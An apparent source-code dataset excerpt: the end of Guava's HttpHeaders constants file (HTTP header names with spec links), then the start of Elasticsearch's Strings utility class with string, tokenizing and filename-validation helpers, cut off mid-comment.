public static final String PROXY_AUTHENTICATE = "Proxy-Authenticate";
/** The HTTP {@code Refresh} header field name. Non-standard header supported by most browsers. */
public static final String REFRESH = "Refresh";
/**
* The HTTP <a href="https://www.w3.org/TR/reporting/">{@code Report-To}</a> header field name.
*
* @since 27.1
*/
public static final String REPORT_TO = "Report-To";
/** The HTTP {@code Retry-After} header field name. */
public static final String RETRY_AFTER = "Retry-After";
/** The HTTP {@code Server} header field name. */
public static final String SERVER = "Server";
/**
* The HTTP <a href="https://www.w3.org/TR/server-timing/">{@code Server-Timing}</a> header field
* name.
*
* @since 23.6
*/
public static final String SERVER_TIMING = "Server-Timing";
/**
* The HTTP <a href="https://www.w3.org/TR/service-workers/#update-algorithm">{@code
* Service-Worker-Allowed}</a> header field name.
*
* @since 20.0
*/
public static final String SERVICE_WORKER_ALLOWED = "Service-Worker-Allowed";
/** The HTTP {@code Set-Cookie} header field name. */
public static final String SET_COOKIE = "Set-Cookie";
/** The HTTP {@code Set-Cookie2} header field name. */
public static final String SET_COOKIE2 = "Set-Cookie2";
/**
* The HTTP <a href="http://goo.gl/Dxx19N">{@code SourceMap}</a> header field name.
*
* @since 27.1
*/
public static final String SOURCE_MAP = "SourceMap";
/**
* The HTTP <a href="https://github.com/WICG/nav-speculation/blob/main/opt-in.md">{@code
* Supports-Loading-Mode}</a> header field name. This can be used to specify, for example, <a
* href="https://developer.chrome.com/docs/privacy-sandbox/fenced-frame/#server-opt-in">fenced
* frames</a>.
*
* @since 32.0.0
*/
public static final String SUPPORTS_LOADING_MODE = "Supports-Loading-Mode";
/**
* The HTTP <a href="http://tools.ietf.org/html/rfc6797#section-6.1">{@code
* Strict-Transport-Security}</a> header field name.
*
* @since 15.0
*/
public static final String STRICT_TRANSPORT_SECURITY = "Strict-Transport-Security";
/**
* The HTTP <a href="http://www.w3.org/TR/resource-timing/#cross-origin-resources">{@code
* Timing-Allow-Origin}</a> header field name.
*
* @since 15.0
*/
public static final String TIMING_ALLOW_ORIGIN = "Timing-Allow-Origin";
/** The HTTP {@code Trailer} header field name. */
public static final String TRAILER = "Trailer";
/** The HTTP {@code Transfer-Encoding} header field name. */
public static final String TRANSFER_ENCODING = "Transfer-Encoding";
/** The HTTP {@code Vary} header field name. */
public static final String VARY = "Vary";
/** The HTTP {@code WWW-Authenticate} header field name. */
public static final String WWW_AUTHENTICATE = "WWW-Authenticate";
// Common, non-standard HTTP header fields
/** The HTTP {@code DNT} header field name. */
public static final String DNT = "DNT";
/** The HTTP {@code X-Content-Type-Options} header field name. */
public static final String X_CONTENT_TYPE_OPTIONS = "X-Content-Type-Options";
/**
* The HTTP <a
* href="https://iabtechlab.com/wp-content/uploads/2019/06/VAST_4.2_final_june26.pdf">{@code
* X-Device-IP}</a> header field name. Header used for VAST requests to provide the IP address of
* the device on whose behalf the request is being made.
*
* @since 31.0
*/
public static final String X_DEVICE_IP = "X-Device-IP";
/**
* The HTTP <a
* href="https://iabtechlab.com/wp-content/uploads/2019/06/VAST_4.2_final_june26.pdf">{@code
* X-Device-Referer}</a> header field name. Header used for VAST requests to provide the {@link
* #REFERER} header value that the on-behalf-of client would have used when making a request
* itself.
*
* @since 31.0
*/
public static final String X_DEVICE_REFERER = "X-Device-Referer";
/**
* The HTTP <a
* href="https://iabtechlab.com/wp-content/uploads/2019/06/VAST_4.2_final_june26.pdf">{@code
* X-Device-Accept-Language}</a> header field name. Header used for VAST requests to provide the
* {@link #ACCEPT_LANGUAGE} header value that the on-behalf-of client would have used when making
* a request itself.
*
* @since 31.0
*/
public static final String X_DEVICE_ACCEPT_LANGUAGE = "X-Device-Accept-Language";
/**
* The HTTP <a
* href="https://iabtechlab.com/wp-content/uploads/2019/06/VAST_4.2_final_june26.pdf">{@code
* X-Device-Requested-With}</a> header field name. Header used for VAST requests to provide the
* {@link #X_REQUESTED_WITH} header value that the on-behalf-of client would have used when making
* a request itself.
*
* @since 31.0
*/
public static final String X_DEVICE_REQUESTED_WITH = "X-Device-Requested-With";
/** The HTTP {@code X-Do-Not-Track} header field name. */
public static final String X_DO_NOT_TRACK = "X-Do-Not-Track";
/** The HTTP {@code X-Forwarded-For} header field name (superseded by {@code Forwarded}). */
public static final String X_FORWARDED_FOR = "X-Forwarded-For";
/** The HTTP {@code X-Forwarded-Proto} header field name. */
public static final String X_FORWARDED_PROTO = "X-Forwarded-Proto";
/**
* The HTTP <a href="http://goo.gl/lQirAH">{@code X-Forwarded-Host}</a> header field name.
*
* @since 20.0
*/
public static final String X_FORWARDED_HOST = "X-Forwarded-Host";
/**
* The HTTP <a href="http://goo.gl/YtV2at">{@code X-Forwarded-Port}</a> header field name.
*
* @since 20.0
*/
public static final String X_FORWARDED_PORT = "X-Forwarded-Port";
/** The HTTP {@code X-Frame-Options} header field name. */
public static final String X_FRAME_OPTIONS = "X-Frame-Options";
/** The HTTP {@code X-Powered-By} header field name. */
public static final String X_POWERED_BY = "X-Powered-By";
/**
* The HTTP <a href="http://tools.ietf.org/html/draft-evans-palmer-key-pinning">{@code
* Public-Key-Pins}</a> header field name.
*
* @since 15.0
*/
public static final String PUBLIC_KEY_PINS = "Public-Key-Pins";
/**
* The HTTP <a href="http://tools.ietf.org/html/draft-evans-palmer-key-pinning">{@code
* Public-Key-Pins-Report-Only}</a> header field name.
*
* @since 15.0
*/
public static final String PUBLIC_KEY_PINS_REPORT_ONLY = "Public-Key-Pins-Report-Only";
/**
* The HTTP {@code X-Request-ID} header field name.
*
* @since 30.1
*/
public static final String X_REQUEST_ID = "X-Request-ID";
/** The HTTP {@code X-Requested-With} header field name. */
public static final String X_REQUESTED_WITH = "X-Requested-With";
/** The HTTP {@code X-User-IP} header field name. */
public static final String X_USER_IP = "X-User-IP";
/**
* The HTTP <a href="https://goo.gl/VKpXxa">{@code X-Download-Options}</a> header field name.
*
* <p>When the new X-Download-Options header is present with the value {@code noopen}, the user is
* prevented from opening a file download directly; instead, they must first save the file
* locally.
*
* @since 24.1
*/
public static final String X_DOWNLOAD_OPTIONS = "X-Download-Options";
/** The HTTP {@code X-XSS-Protection} header field name. */
public static final String X_XSS_PROTECTION = "X-XSS-Protection";
/**
* The HTTP <a
* href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-DNS-Prefetch-Control">{@code
* X-DNS-Prefetch-Control}</a> header controls DNS prefetch behavior. Value can be "on" or "off".
* By default, DNS prefetching is "on" for HTTP pages and "off" for HTTPS pages.
*/
public static final String X_DNS_PREFETCH_CONTROL = "X-DNS-Prefetch-Control";
/**
* The HTTP <a href="http://html.spec.whatwg.org/multipage/semantics.html#hyperlink-auditing">
* {@code Ping-From}</a> header field name.
*
* @since 19.0
*/
public static final String PING_FROM = "Ping-From";
/**
* The HTTP <a href="http://html.spec.whatwg.org/multipage/semantics.html#hyperlink-auditing">
* {@code Ping-To}</a> header field name.
*
* @since 19.0
*/
public static final String PING_TO = "Ping-To";
/**
* The HTTP <a
* href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Link_prefetching_FAQ#As_a_server_admin.2C_can_I_distinguish_prefetch_requests_from_normal_requests.3F">{@code
* Purpose}</a> header field name.
*
* @since 28.0
*/
public static final String PURPOSE = "Purpose";
/**
* The HTTP <a
* href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Link_prefetching_FAQ#As_a_server_admin.2C_can_I_distinguish_prefetch_requests_from_normal_requests.3F">{@code
* X-Purpose}</a> header field name.
*
* @since 28.0
*/
public static final String X_PURPOSE = "X-Purpose";
/**
* The HTTP <a
* href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Link_prefetching_FAQ#As_a_server_admin.2C_can_I_distinguish_prefetch_requests_from_normal_requests.3F">{@code
* X-Moz}</a> header field name.
*
* @since 28.0
*/
public static final String X_MOZ = "X-Moz";
/**
* The HTTP <a
* href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Device-Memory">{@code
* Device-Memory}</a> header field name.
*
* @since 31.0
*/
public static final String DEVICE_MEMORY = "Device-Memory";
/**
* The HTTP <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Downlink">{@code
* Downlink}</a> header field name.
*
* @since 31.0
*/
public static final String DOWNLINK = "Downlink";
/**
* The HTTP <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/ECT">{@code
* ECT}</a> header field name.
*
* @since 31.0
*/
public static final String ECT = "ECT";
/**
* The HTTP <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/RTT">{@code
* RTT}</a> header field name.
*
* @since 31.0
*/
public static final String RTT = "RTT";
/**
* The HTTP <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Save-Data">{@code
* Save-Data}</a> header field name.
*
* @since 31.0
*/
public static final String SAVE_DATA = "Save-Data";
/**
* The HTTP <a
* href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Viewport-Width">{@code
* Viewport-Width}</a> header field name.
*
* @since 31.0
*/
public static final String VIEWPORT_WIDTH = "Viewport-Width";
/**
* The HTTP <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Width">{@code
* Width}</a> header field name.
*
* @since 31.0
*/
public static final String WIDTH = "Width";
/**
* The HTTP <a href="https://www.w3.org/TR/permissions-policy-1/">{@code Permissions-Policy}</a>
* header field name.
*
* @since 31.0
*/
public static final String PERMISSIONS_POLICY = "Permissions-Policy";
/**
* The HTTP <a
* href="https://w3c.github.io/webappsec-permissions-policy/#permissions-policy-report-only-http-header-field">{@code
* Permissions-Policy-Report-Only}</a> header field name.
*
* @since 33.2.0
*/
public static final String PERMISSIONS_POLICY_REPORT_ONLY = "Permissions-Policy-Report-Only";
/**
* The HTTP <a
* href="https://wicg.github.io/user-preference-media-features-headers/#sec-ch-prefers-color-scheme">{@code
* Sec-CH-Prefers-Color-Scheme}</a> header field name.
*
* <p>This header is experimental.
*
* @since 31.0
*/
public static final String SEC_CH_PREFERS_COLOR_SCHEME = "Sec-CH-Prefers-Color-Scheme";
/**
* The HTTP <a
* href="https://www.rfc-editor.org/rfc/rfc8942#name-the-accept-ch-response-head">{@code
* Accept-CH}</a> header field name.
*
* @since 31.0
*/
public static final String ACCEPT_CH = "Accept-CH";
/**
* The HTTP <a
* href="https://datatracker.ietf.org/doc/html/draft-davidben-http-client-hint-reliability-03.txt#section-3">{@code
* Critical-CH}</a> header field name.
*
* @since 31.0
*/
public static final String CRITICAL_CH = "Critical-CH";
/**
* The HTTP <a href="https://wicg.github.io/ua-client-hints/#sec-ch-ua">{@code Sec-CH-UA}</a>
* header field name.
*
* @since 30.0
*/
public static final String SEC_CH_UA = "Sec-CH-UA";
/**
* The HTTP <a href="https://wicg.github.io/ua-client-hints/#sec-ch-ua-arch">{@code
* Sec-CH-UA-Arch}</a> header field name.
*
* @since 30.0
*/
public static final String SEC_CH_UA_ARCH = "Sec-CH-UA-Arch";
/**
* The HTTP <a href="https://wicg.github.io/ua-client-hints/#sec-ch-ua-model">{@code
* Sec-CH-UA-Model}</a> header field name.
*
* @since 30.0
*/
public static final String SEC_CH_UA_MODEL = "Sec-CH-UA-Model";
/**
* The HTTP <a href="https://wicg.github.io/ua-client-hints/#sec-ch-ua-platform">{@code
* Sec-CH-UA-Platform}</a> header field name.
*
* @since 30.0
*/
public static final String SEC_CH_UA_PLATFORM = "Sec-CH-UA-Platform";
/**
* The HTTP <a href="https://wicg.github.io/ua-client-hints/#sec-ch-ua-platform-version">{@code
* Sec-CH-UA-Platform-Version}</a> header field name.
*
* @since 30.0
*/
public static final String SEC_CH_UA_PLATFORM_VERSION = "Sec-CH-UA-Platform-Version";
/**
* The HTTP <a href="https://wicg.github.io/ua-client-hints/#sec-ch-ua-full-version">{@code
* Sec-CH-UA-Full-Version}</a> header field name.
*
* @deprecated Prefer {@link SEC_CH_UA_FULL_VERSION_LIST}.
* @since 30.0
*/
@Deprecated public static final String SEC_CH_UA_FULL_VERSION = "Sec-CH-UA-Full-Version";
/**
* The HTTP <a href="https://wicg.github.io/ua-client-hints/#sec-ch-ua-full-version-list">{@code
* Sec-CH-UA-Full-Version}</a> header field name.
*
* @since 31.1
*/
public static final String SEC_CH_UA_FULL_VERSION_LIST = "Sec-CH-UA-Full-Version-List";
/**
* The HTTP <a href="https://wicg.github.io/ua-client-hints/#sec-ch-ua-mobile">{@code
* Sec-CH-UA-Mobile}</a> header field name.
*
* @since 30.0
*/
public static final String SEC_CH_UA_MOBILE = "Sec-CH-UA-Mobile";
/**
* The HTTP <a href="https://wicg.github.io/ua-client-hints/#sec-ch-ua-wow64">{@code
* Sec-CH-UA-WoW64}</a> header field name.
*
* @since 32.0.0
*/
public static final String SEC_CH_UA_WOW64 = "Sec-CH-UA-WoW64";
/**
* The HTTP <a href="https://wicg.github.io/ua-client-hints/#sec-ch-ua-bitness">{@code
* Sec-CH-UA-Bitness}</a> header field name.
*
* @since 31.0
*/
public static final String SEC_CH_UA_BITNESS = "Sec-CH-UA-Bitness";
/**
* The HTTP <a href="https://wicg.github.io/ua-client-hints/#sec-ch-ua-form-factor">{@code
* Sec-CH-UA-Form-Factor}</a> header field name.
*
* @since 32.0.0
*/
public static final String SEC_CH_UA_FORM_FACTOR = "Sec-CH-UA-Form-Factor";
/**
* The HTTP <a
* href="https://wicg.github.io/responsive-image-client-hints/#sec-ch-viewport-width">{@code
* Sec-CH-Viewport-Width}</a> header field name.
*
* @since 32.0.0
*/
public static final String SEC_CH_VIEWPORT_WIDTH = "Sec-CH-Viewport-Width";
/**
* The HTTP <a
* href="https://wicg.github.io/responsive-image-client-hints/#sec-ch-viewport-height">{@code
* Sec-CH-Viewport-Height}</a> header field name.
*
* @since 32.0.0
*/
public static final String SEC_CH_VIEWPORT_HEIGHT = "Sec-CH-Viewport-Height";
/**
* The HTTP <a href="https://wicg.github.io/responsive-image-client-hints/#sec-ch-dpr">{@code
* Sec-CH-DPR}</a> header field name.
*
* @since 32.0.0
*/
public static final String SEC_CH_DPR = "Sec-CH-DPR";
/**
* The HTTP <a href="https://w3c.github.io/webappsec-fetch-metadata/">{@code Sec-Fetch-Dest}</a>
* header field name.
*
* @since 27.1
*/
public static final String SEC_FETCH_DEST = "Sec-Fetch-Dest";
/**
* The HTTP <a href="https://w3c.github.io/webappsec-fetch-metadata/">{@code Sec-Fetch-Mode}</a>
* header field name.
*
* @since 27.1
*/
public static final String SEC_FETCH_MODE = "Sec-Fetch-Mode";
/**
* The HTTP <a href="https://w3c.github.io/webappsec-fetch-metadata/">{@code Sec-Fetch-Site}</a>
* header field name.
*
* @since 27.1
*/
public static final String SEC_FETCH_SITE = "Sec-Fetch-Site";
/**
* The HTTP <a href="https://w3c.github.io/webappsec-fetch-metadata/">{@code Sec-Fetch-User}</a>
* header field name.
*
* @since 27.1
*/
public static final String SEC_FETCH_USER = "Sec-Fetch-User";
/**
* The HTTP <a href="https://w3c.github.io/webappsec-fetch-metadata/">{@code Sec-Metadata}</a>
* header field name.
*
* @since 26.0
*/
public static final String SEC_METADATA = "Sec-Metadata";
/**
* The HTTP <a href="https://tools.ietf.org/html/draft-ietf-tokbind-https">{@code
* Sec-Token-Binding}</a> header field name.
*
* @since 25.1
*/
public static final String SEC_TOKEN_BINDING = "Sec-Token-Binding";
/**
* The HTTP <a href="https://tools.ietf.org/html/draft-ietf-tokbind-ttrp">{@code
* Sec-Provided-Token-Binding-ID}</a> header field name.
*
* @since 25.1
*/
public static final String SEC_PROVIDED_TOKEN_BINDING_ID = "Sec-Provided-Token-Binding-ID";
/**
* The HTTP <a href="https://tools.ietf.org/html/draft-ietf-tokbind-ttrp">{@code
* Sec-Referred-Token-Binding-ID}</a> header field name.
*
* @since 25.1
*/
public static final String SEC_REFERRED_TOKEN_BINDING_ID = "Sec-Referred-Token-Binding-ID";
/**
* The HTTP <a href="https://tools.ietf.org/html/rfc6455">{@code Sec-WebSocket-Accept}</a> header
* field name.
*
* @since 28.0
*/
public static final String SEC_WEBSOCKET_ACCEPT = "Sec-WebSocket-Accept";
/**
* The HTTP <a href="https://tools.ietf.org/html/rfc6455">{@code Sec-WebSocket-Extensions}</a>
* header field name.
*
* @since 28.0
*/
public static final String SEC_WEBSOCKET_EXTENSIONS = "Sec-WebSocket-Extensions";
/**
* The HTTP <a href="https://tools.ietf.org/html/rfc6455">{@code Sec-WebSocket-Key}</a> header
* field name.
*
* @since 28.0
*/
public static final String SEC_WEBSOCKET_KEY = "Sec-WebSocket-Key";
/**
* The HTTP <a href="https://tools.ietf.org/html/rfc6455">{@code Sec-WebSocket-Protocol}</a>
* header field name.
*
* @since 28.0
*/
public static final String SEC_WEBSOCKET_PROTOCOL = "Sec-WebSocket-Protocol";
/**
* The HTTP <a href="https://tools.ietf.org/html/rfc6455">{@code Sec-WebSocket-Version}</a> header
* field name.
*
* @since 28.0
*/
public static final String SEC_WEBSOCKET_VERSION = "Sec-WebSocket-Version";
/**
* The HTTP <a href="https://patcg-individual-drafts.github.io/topics/">{@code
* Sec-Browsing-Topics}</a> header field name.
*
* @since 32.0.0
*/
public static final String SEC_BROWSING_TOPICS = "Sec-Browsing-Topics";
/**
* The HTTP <a href="https://patcg-individual-drafts.github.io/topics/">{@code
* Observe-Browsing-Topics}</a> header field name.
*
* @since 32.0.0
*/
public static final String OBSERVE_BROWSING_TOPICS = "Observe-Browsing-Topics";
/**
* The HTTP <a
* href="https://wicg.github.io/turtledove/#handling-direct-from-seller-signals">{@code
* Sec-Ad-Auction-Fetch}</a> header field name.
*
* @since 33.0.0
*/
public static final String SEC_AD_AUCTION_FETCH = "Sec-Ad-Auction-Fetch";
/**
* The HTTP <a
* href="https://privacycg.github.io/gpc-spec/#the-sec-gpc-header-field-for-http-requests">{@code
* Sec-GPC}</a> header field name.
*
* @since 33.2.0
*/
public static final String SEC_GPC = "Sec-GPC";
/**
* The HTTP <a
* href="https://wicg.github.io/turtledove/#handling-direct-from-seller-signals">{@code
* Ad-Auction-Signals}</a> header field name.
*
* @since 33.0.0
*/
public static final String AD_AUCTION_SIGNALS = "Ad-Auction-Signals";
/**
* The HTTP <a href="https://wicg.github.io/turtledove/#http-headerdef-ad-auction-allowed">{@code
* Ad-Auction-Allowed}</a> header field name.
*
* @since 33.2.0
*/
public static final String AD_AUCTION_ALLOWED = "Ad-Auction-Allowed";
/**
* The HTTP <a href="https://tools.ietf.org/html/rfc8586">{@code CDN-Loop}</a> header field name.
*
* @since 28.0
*/
public static final String CDN_LOOP = "CDN-Loop";
}
| google/guava | guava/src/com/google/common/net/HttpHeaders.java |
1,141 | /*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the Elastic License
* 2.0 and the Server Side Public License, v 1; you may not use this file except
* in compliance with, at your election, the Elastic License 2.0 or the Server
* Side Public License, v 1.
*/
package org.elasticsearch.common;
import org.apache.lucene.util.BytesRefBuilder;
import org.elasticsearch.ElasticsearchException;
import org.elasticsearch.ExceptionsHelper;
import org.elasticsearch.common.bytes.BytesReference;
import org.elasticsearch.common.util.CollectionUtils;
import org.elasticsearch.common.xcontent.ChunkedToXContent;
import org.elasticsearch.core.Nullable;
import org.elasticsearch.xcontent.ToXContent;
import org.elasticsearch.xcontent.XContentBuilder;
import org.elasticsearch.xcontent.json.JsonXContent;
import java.io.IOException;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collection;
import java.util.Collections;
import java.util.HashSet;
import java.util.Iterator;
import java.util.List;
import java.util.Objects;
import java.util.Set;
import java.util.StringTokenizer;
import java.util.TreeSet;
import java.util.function.Supplier;
import java.util.regex.Pattern;
import java.util.stream.Collectors;
public class Strings {
public static final String[] EMPTY_ARRAY = new String[0];
// ---------------------------------------------------------------------
// General convenience methods for working with Strings
// ---------------------------------------------------------------------
/**
* Check that the given CharSequence is neither <code>null</code> nor of length 0.
* Note: Will return <code>true</code> for a CharSequence that purely consists of whitespace.
* <pre>
* StringUtils.hasLength(null) = false
* StringUtils.hasLength("") = false
* StringUtils.hasLength(" ") = true
* StringUtils.hasLength("Hello") = true
* </pre>
*
* @param str the CharSequence to check (may be <code>null</code>)
* @return <code>true</code> if the CharSequence is not null and has length
* @see #hasText(String)
*/
public static boolean hasLength(CharSequence str) {
return (str != null && str.isEmpty() == false);
}
/**
* Check that the given BytesReference is neither <code>null</code> nor of length 0
* Note: Will return <code>true</code> for a BytesReference that purely consists of whitespace.
*
* @param bytesReference the BytesReference to check (may be <code>null</code>)
* @return <code>true</code> if the BytesReference is not null and has length
* @see #hasLength(CharSequence)
*/
public static boolean hasLength(BytesReference bytesReference) {
return (bytesReference != null && bytesReference.length() > 0);
}
/**
* Check that the given String is neither <code>null</code> nor of length 0.
* Note: Will return <code>true</code> for a String that purely consists of whitespace.
*
* @param str the String to check (may be <code>null</code>)
* @return <code>true</code> if the String is not null and has length
* @see #hasLength(CharSequence)
*/
public static boolean hasLength(String str) {
return hasLength((CharSequence) str);
}
/**
* Check that the given CharSequence is either <code>null</code> or of length 0.
* Note: Will return <code>false</code> for a CharSequence that purely consists of whitespace.
* <pre>
* StringUtils.isEmpty(null) = true
* StringUtils.isEmpty("") = true
* StringUtils.isEmpty(" ") = false
* StringUtils.isEmpty("Hello") = false
* </pre>
*
* @param str the CharSequence to check (may be <code>null</code>)
* @return <code>true</code> if the CharSequence is either null or has a zero length
*/
public static boolean isEmpty(CharSequence str) {
return hasLength(str) == false;
}
/**
* Check whether the given CharSequence has actual text.
* More specifically, returns <code>true</code> if the string not <code>null</code>,
* its length is greater than 0, and it contains at least one non-whitespace character.
* <pre>
* StringUtils.hasText(null) = false
* StringUtils.hasText("") = false
* StringUtils.hasText(" ") = false
* StringUtils.hasText("12345") = true
* StringUtils.hasText(" 12345 ") = true
* </pre>
*
* @param str the CharSequence to check (may be <code>null</code>)
* @return <code>true</code> if the CharSequence is not <code>null</code>,
* its length is greater than 0, and it does not contain whitespace only
* @see java.lang.Character#isWhitespace
*/
public static boolean hasText(CharSequence str) {
if (hasLength(str) == false) {
return false;
}
int strLen = str.length();
for (int i = 0; i < strLen; i++) {
if (Character.isWhitespace(str.charAt(i)) == false) {
return true;
}
}
return false;
}
/**
* Check whether the given String has actual text.
* More specifically, returns <code>true</code> if the string not <code>null</code>,
* its length is greater than 0, and it contains at least one non-whitespace character.
*
* @param str the String to check (may be <code>null</code>)
* @return <code>true</code> if the String is not <code>null</code>, its length is
* greater than 0, and it does not contain whitespace only
* @see #hasText(CharSequence)
*/
public static boolean hasText(String str) {
return isNullOrBlank(str) == false;
}
/**
* Trim all occurrences of the supplied leading character from the given String.
*
* @param str the String to check
* @param leadingCharacter the leading character to be trimmed
* @return the trimmed String
*/
public static String trimLeadingCharacter(String str, char leadingCharacter) {
if (hasLength(str) == false) {
return str;
}
int i = 0;
while (i < str.length() && str.charAt(i) == leadingCharacter) {
i++;
}
return str.substring(i);
}
/**
* Test whether the given string matches the given substring
* at the given index.
*
* @param str the original string (or StringBuilder)
* @param index the index in the original string to start matching against
* @param substring the substring to match at the given index
*/
public static boolean substringMatch(CharSequence str, int index, CharSequence substring) {
for (int j = 0; j < substring.length(); j++) {
int i = index + j;
if (i >= str.length() || str.charAt(i) != substring.charAt(j)) {
return false;
}
}
return true;
}
/**
* Replace all occurrences of a substring within a string with
* another string.
*
* @param inString String to examine
* @param oldPattern String to replace
* @param newPattern String to insert
* @return a String with the replacements
*/
public static String replace(String inString, String oldPattern, String newPattern) {
if (hasLength(inString) == false || hasLength(oldPattern) == false || newPattern == null) {
return inString;
}
StringBuilder sb = new StringBuilder();
int pos = 0; // our position in the old string
int index = inString.indexOf(oldPattern);
// the index of an occurrence we've found, or -1
int patLen = oldPattern.length();
while (index >= 0) {
sb.append(inString, pos, index);
sb.append(newPattern);
pos = index + patLen;
index = inString.indexOf(oldPattern, pos);
}
sb.append(inString.substring(pos));
// remember to append any characters to the right of a match
return sb.toString();
}
/**
* Delete any character in a given String.
*
* @param inString the original String
* @param charsToDelete a set of characters to delete.
* E.g. "az\n" will delete 'a's, 'z's and new lines.
* @return the resulting String
*/
public static String deleteAny(String inString, String charsToDelete) {
return inString != null ? deleteAny((CharSequence) inString, charsToDelete).toString() : null;
}
/**
* Delete any character in a given CharSequence.
*
* @param inString the original CharSequence
* @param charsToDelete a set of characters to delete.
* E.g. "az\n" will delete 'a's, 'z's and new lines.
* @return the resulting CharSequence
*/
public static CharSequence deleteAny(CharSequence inString, String charsToDelete) {
if (hasLength(inString) == false || hasLength(charsToDelete) == false) {
return inString;
}
StringBuilder sb = new StringBuilder(inString.length());
for (int i = 0; i < inString.length(); i++) {
char c = inString.charAt(i);
if (charsToDelete.indexOf(c) == -1) {
sb.append(c);
}
}
return sb;
}
// ---------------------------------------------------------------------
// Convenience methods for working with formatted Strings
// ---------------------------------------------------------------------
/**
* Capitalize a <code>String</code>, changing the first letter to
* upper case as per {@link Character#toUpperCase(char)}.
* No other letters are changed.
*
* @param str the String to capitalize, may be <code>null</code>
* @return the capitalized String, <code>null</code> if null
*/
public static String capitalize(String str) {
return changeFirstCharacterCase(str, true);
}
private static String changeFirstCharacterCase(String str, boolean capitalize) {
if (str == null || str.length() == 0) {
return str;
}
char newChar = capitalize ? Character.toUpperCase(str.charAt(0)) : Character.toLowerCase(str.charAt(0));
if (newChar == str.charAt(0)) {
return str; // nothing changed
}
return newChar + str.substring(1);
}
// Visible for testing
static final Set<Character> INVALID_CHARS = Set.of('\\', '/', '*', '?', '"', '<', '>', '|', ' ', ',');
public static final String INVALID_FILENAME_CHARS = INVALID_CHARS.stream()
.map(c -> "'" + c + "'")
.collect(Collectors.joining(",", "[", "]"));
public static final Pattern INVALID_FILENAME_CHARS_REGEX = Pattern.compile(
"[" + INVALID_CHARS.stream().map(Objects::toString).map(Pattern::quote).collect(Collectors.joining()) + "]+"
);
public static boolean validFileName(String fileName) {
for (int i = 0; i < fileName.length(); i++) {
if (isInvalidFileNameCharacter(fileName.charAt(i))) {
return false;
}
}
return true;
}
public static boolean validFileNameExcludingAstrix(String fileName) {
for (int i = 0; i < fileName.length(); i++) {
char c = fileName.charAt(i);
if (c != '*' && isInvalidFileNameCharacter(c)) {
return false;
}
}
return true;
}
private static boolean isInvalidFileNameCharacter(char c) {
return switch (c) {
case '\\', '/', '*', '?', '"', '<', '>', '|', ' ', ',' -> true;
default -> false;
};
}
/**
* Copy the given Collection into a String array.
* The Collection must contain String elements only.
*
* @param collection the Collection to copy
* @return the String array (<code>null</code> if the passed-in
* Collection was <code>null</code>)
*/
public static String[] toStringArray(Collection<String> collection) {
if (collection == null) {
return null;
}
return collection.toArray(String[]::new);
}
/**
* Concatenate two string arrays into a third
*/
public static String[] concatStringArrays(String[] first, String[] second) {
if (first == null && second == null) {
return Strings.EMPTY_ARRAY;
}
if (first == null || first.length == 0) {
return second;
}
if (second == null || second.length == 0) {
return first;
}
String[] concat = new String[first.length + second.length];
System.arraycopy(first, 0, concat, 0, first.length);
System.arraycopy(second, 0, concat, first.length, second.length);
return concat;
}
/**
* Tokenize the specified string by commas to a set, trimming whitespace and ignoring empty tokens.
*
* @param s the string to tokenize
* @return the set of tokens
*/
public static Set<String> tokenizeByCommaToSet(final String s) {
if (s == null) return Collections.emptySet();
return tokenizeToCollection(s, ",", HashSet::new);
}
/**
* Split the specified string by commas to an array.
*
* @param s the string to split
* @return the array of split values
* @see String#split(String)
*/
public static String[] splitStringByCommaToArray(final String s) {
if (s == null || s.isEmpty()) return Strings.EMPTY_ARRAY;
else return s.split(",");
}
/**
* Split a String at the first occurrence of the delimiter.
* Does not include the delimiter in the result.
*
* @param toSplit the string to split
* @param delimiter to split the string up with
* @return a two element array with index 0 being before the delimiter, and
* index 1 being after the delimiter (neither element includes the delimiter);
* or <code>null</code> if the delimiter wasn't found in the given input String
*/
public static String[] split(String toSplit, String delimiter) {
if (hasLength(toSplit) == false || hasLength(delimiter) == false) {
return null;
}
int offset = toSplit.indexOf(delimiter);
if (offset < 0) {
return null;
}
String beforeDelimiter = toSplit.substring(0, offset);
String afterDelimiter = toSplit.substring(offset + delimiter.length());
return new String[] { beforeDelimiter, afterDelimiter };
}
/**
* Tokenize the given String into a String array via a StringTokenizer.
* Trims tokens and omits empty tokens.
* <p>The given delimiters string is supposed to consist of any number of
* delimiter characters. Each of those characters can be used to separate
* tokens. A delimiter is always a single character; for multi-character
* delimiters, consider using <code>delimitedListToStringArray</code>
*
* @param s the String to tokenize
* @param delimiters the delimiter characters, assembled as String
* (each of those characters is individually considered as delimiter).
* @return an array of the tokens
* @see java.util.StringTokenizer
* @see java.lang.String#trim()
* @see #delimitedListToStringArray
*/
public static String[] tokenizeToStringArray(final String s, final String delimiters) {
if (s == null) {
return EMPTY_ARRAY;
}
return toStringArray(tokenizeToCollection(s, delimiters, ArrayList::new));
}
/**
* Tokenizes the specified string to a collection using the specified delimiters as the token delimiters. This method trims whitespace
* from tokens and ignores empty tokens.
*
* @param s the string to tokenize.
* @param delimiters the token delimiters
* @param supplier a collection supplier
* @param <T> the type of the collection
* @return the tokens
* @see java.util.StringTokenizer
*/
private static <T extends Collection<String>> T tokenizeToCollection(
final String s,
final String delimiters,
final Supplier<T> supplier
) {
if (s == null) {
return null;
}
final StringTokenizer tokenizer = new StringTokenizer(s, delimiters);
final T tokens = supplier.get();
while (tokenizer.hasMoreTokens()) {
final String token = tokenizer.nextToken().trim();
if (token.length() > 0) {
tokens.add(token);
}
}
return tokens;
}
/**
* Take a String which is a delimited list and convert it to a String array.
* <p>A single delimiter can consists of more than one character: It will still
* be considered as single delimiter string, rather than as bunch of potential
* delimiter characters - in contrast to <code>tokenizeToStringArray</code>.
*
* @param str the input String
* @param delimiter the delimiter between elements (this is a single delimiter,
* rather than a bunch individual delimiter characters)
* @return an array of the tokens in the list
